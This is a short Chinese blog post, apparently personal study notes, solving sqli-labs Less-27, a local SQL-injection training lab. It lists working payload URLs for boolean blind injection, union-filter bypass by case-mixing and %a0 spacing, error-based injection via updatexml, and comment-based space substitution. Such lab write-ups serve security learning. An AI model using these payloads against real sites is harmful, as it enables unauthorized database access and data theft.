[sqli-labs]Less-27(Bool盲注 , 双写绕过 , 随机大小写绕过 , 报错注入 , 特殊字符替换空格)

思路一 :

http://127.0.0.1/Less-27/?id=0%27||()||%271%27=%27--+
利用注入点盲注

思路二 : 参考资料

利用回显明注 , 过滤了union , 可以通过双写来绕过 , 或者大小写混写来绕过
卧槽这个太屌了
http://127.0.0.1/Less-27/?id=0%27%a0UnION%a0SelECT(user()),2,3%27
%a0 是什么鬼
有待研究

思路三 :

利用报错注入
http://127.0.0.1/Less-27/?id=0%27||(updatexml(1,concat(0x5e5e,version(),0x5e5e),1))||%271%27=%27--+

思路四 :

强行制造空格 , URL编码 + 注释
http://127.0.0.1/Less-28/?id=0/*%0a*/and/*%0a*/0--+
http://127.0.0.1/Less-27/?id=0%27/*%0a*/or/*%0a*/%27%27=%27
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

友情链接更多精彩内容